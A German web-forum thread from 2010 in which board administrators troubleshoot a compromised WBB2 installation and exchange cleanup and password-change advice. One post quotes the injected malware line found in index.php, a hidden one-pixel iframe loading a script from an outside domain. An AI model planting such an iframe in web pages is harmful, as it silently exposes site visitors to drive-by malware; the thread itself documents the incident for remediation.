Haumis wbb hilfe (http://haumis-wbb-hilfe.de/wbb2/index.php)
- WBB2 (http://haumis-wbb-hilfe.de/wbb2/board.php?boardid=3)
-- Fehlermeldungen (http://haumis-wbb-hilfe.de/wbb2/board.php?boardid=62)
--- Hallo die Experten! (http://haumis-wbb-hilfe.de/wbb2/thread.php?threadid=1151)

Geschrieben von sigi47 am 26.12.2010 um 18:47:

icon18 Hallo die Experten!

Habe vor einigen Tagen die Meldung bekommen, "sie wurden als unsichere Seite gemeldet", betreibe mein Board (siehe Mitglieder) nun schon einige Jahre, habe eigentlich nichts geändert in letzter Zeit!
Nun komme ich seit Gestern nicht mehr in mein "acp"! Hängt das damit zusammen?
Oder ist das nur ein Zufall?

Weiss jemand von Euch was man da machen kann!
Schon mal ein "danke" im Voraus!


Geschrieben von haumi am 26.12.2010 um 22:32:

 

Hi Sigi,
Nicht ins ACP zu kommen kann eigentlich viele Gründe haben.
Der häufigste ist das Vorhandensein des Securityhacks.
Damit wurden schon einige Admins ausgesperrt.

Um das aber genau rauszubekommen müsste ich doch einige Daten von dir haben.
FTP-Zugang, wenn es am Security liegen sollte und/oder Zugang zur Datenbank um das zu reparieren, wenn es doch eine andere Ursache haben soll.

Zur Not können wir auch mal telefonieren.
Melde dich mal per PN und wenn du möchtest das ich mal anrufen soll,
dann gib mal deine Telefonnummer und eine Zeit an.

LG
haumi


Geschrieben von sigi47 am 27.12.2010 um 08:30:

 

Guten Morgen - Haumi
Eine PN zu dir ist unterwegs!

Lg. Sigi


Geschrieben von sigi47 am 27.12.2010 um 13:13:

icon3

Alles läuft klaglos -
an dieser Stelle nochmals ein kräftiges "Danke schön" an "Haumi"!


Geschrieben von Ice Ventura am 27.12.2010 um 13:25:

 

Hab in meinem Forum das gleiche Problem wie Sigi, evtl. könntet ihr hier mal die Fehlerbehebung posten st1

DANKE!


Geschrieben von haumi am 27.12.2010 um 14:14:

 

in der index.php war ganz oben eine Zeile die mit echo anfing.
Da habe ich nur zwei Slashs // davor gemacht.

Ob es bei dir das Gleiche ist weiß ich nicht.

LG
haumi


Geschrieben von Ice Ventura am 27.12.2010 um 14:16:

 

Dann schau ich mir heute Abend mal die index.php genauer an!

Vielen Dank!

lg
Ice


Geschrieben von haumi am 27.12.2010 um 14:23:

 

sollte es nicht so sein dann musst du dich noch mal melden.

LG
haumi


Geschrieben von Ice Ventura am 27.12.2010 um 14:47:

 

Super Danke!

lg
Ice


Geschrieben von james am 27.12.2010 um 16:31:

 

Der Echo Code ist da ja bestimmt nicht von alleine reingekommen.
Das wie, wenn es bekannt ist, würde eine bessere Beschreibung geben.
Es deutet ja daraufhin das ein unbefugter da etwas machen konnte.
Sei es nun mit der Tastatur direkt oder mit einem Schad Code der dann aber auch auf dem Server liegen müsste.


james


Geschrieben von Ice Ventura am 27.12.2010 um 16:51:

 

ja, es ist komisch, vor allem kapier ich den Zusammenhang nicht, die Fehlermeldung

Warning: Cannot modify header information - headers already sent by (output started at /homepages/39/d202064084/htdocs/wbb2/index.php:2) in /homepages/39/d202064084/htdocs/wbb2/acp/lib/functions.php on line 82


und dass mein ACP komplett weiss ist, sowas hab ich noch nie erlebt! st4


Geschrieben von haumi am 27.12.2010 um 16:54:

 

Ich bin nun wieder am PC und habe die index.php nochmal geöffnet um die Zeile mal hier einzustellen.
(Sie war in der wbb2/index.php und wbb2/acp/index.php drin)
Ich würde Sigi raten die Passwörter schnellstmöglich zu ändern.

Hier ist die Zeile welche sich direkt unter <?php befand und jetzt von mir gelöscht wurde.

code: 
1:

echo "<iframe width="1" height="1" src="http://disreco.com/images/start.php?id=vlnd"></iframe>";


Solle es sich erweisen, das bei Ice Ventura ebenfalls diese Zeile drin ist dann auch hier schnellstens die Passwörter ändern.

LG
haumi


Geschrieben von ersatzspieler am 27.12.2010 um 17:09:

 

hab mal googlet solltet ihr mal auch nach disreco.com was da alles so steht st13

LG Blackjubel


Geschrieben von sigi47 am 27.12.2010 um 17:23:

icon13

Hi Blackjubel
Wenn mich nicht alles täuscht, ist dieses "disreco" unten link bei mir kurz aufgeschienen und dann hatte ich den weissen Bildschirm und unten darüber dann "fertig"!


Geschrieben von ersatzspieler am 27.12.2010 um 17:29:

 

na die seite oder weiß ich auch immer steht doch im iframe den haumi gefunden hat in der index.php wen ich das hier alles richtig verstanden habe und habe mal nach googelt und da steht viel drüber und ist erst das meiste seit ein paar tagen .

LG


Geschrieben von Ice Ventura am 27.12.2010 um 18:26:

 

Es hat geklappt! Vielen vielen Dank!

Hab auch gleich alle Kennwörter (ACP + Ftp) geändert st12


Geschrieben von james am 27.12.2010 um 22:56:

 

Die Admin-Passwörter erneuern.
Auch neue Passworte erteilen für ALLE die Zugriff auf das ACP und den Server haben, FTP und Confix.


Jetzt muss nur noch danach gesucht werden wie diese Zeilen zustande gekommen sind.
Durch Zauber oder von alleine kommt so was nicht.


Geschrieben von Listiger_Falke am 28.12.2010 um 01:36:

 

Also folgendes

Ich hatte mal ein ähnliches Problem, der Script ist bei mir NICHT direkt auf den Server gelangt, sondern über dem Umweg vorher meinen PC, den ich zur Serververwaltung nutze, auszuspähen.

Soweit ich das beurteilen kann (recherche über Google bei anderen die diesen Script haben) scheint mir dieser auf die gleiche Weise vorgegangen zu sein.

Bei mir hatte sich ein Trojaner ins Betriebssystem gesetzt, durch einfaches anklicken einer Website. Dieser Trojaner wurde nicht von meinem Virenscanner erkannt/erfasst. Dieser Trojaner hat danach alle Passwörter ausgespäht und ins Internet gesand. Dadurch war es auch nutzlos die Passwörter zu ändern, denn die neuen wurden ja sofort wieder versand.

D.h. nach Säuberung meiner PHP-Dateien des Forums waren diese nach wenigen Tagen wieder verseucht. Mein Script befiel damals alle index.Dateiendung htm/html/php Dateien, auch die in Spielen (was bei einigen Tausend Spielen lustig ist). Ich habe dann den Script an meinen Virenscanneranbieter eingesand, der diesen dann auch als Trojaner klassifizierte, und dann ein Backup bereit stellte, der den Trojaner erkannte. (Allerdings nur in den Onlinedateien, nicht den Ursprung auf meinem PC)

Den Trojaner auf meinem PC konnte ich im folgenden durch eine Anleitung entfernen, die ich danach im I-Net fand. Allerdings dauert es immer einige Tage bis jemand den wirklichen Übeltäter findet und eine Hilfe bereit stellt.

Ich kann also nur empfehlen in der nächsten Zeit immer wieder zu schauen ob dieser oder ähnliche Scripte in der Index auftauchen, falls dieses der Fall ist sitzt das Problem wohl tiefer als in einem Angriff auf den Server. Es empfielt sich auch weiter in Google zu prüfen ob neue Ergebnisse zu dem Script vorliegen (Bezüglich Ursprungsprogramm, welches eventuell den PC befallen hat und weiter ausspäht - Des weiteren empfehle ich eine wirklich vernünftige Virensoftware zu installieren, viele haben Trojaner o.ä. auf der Festplatte, ohne es zu wissen)


Geschrieben von Flughund am 28.12.2010 um 06:54:

 

Guten Morgen zusammen


nun wer gern Wissen möchte was sonst noch so auf seinen PC

sich versteckt hat. Der sollte vielleicht man den Hijack versuchen


Die Bedienung und Anleitung gibt es hier

http://www.hijackthis.de/


Liebe Grüße
Flughund st1 st1 st1


Forensoftware: Burning Board 2.3.6, entwickelt von WoltLab GmbH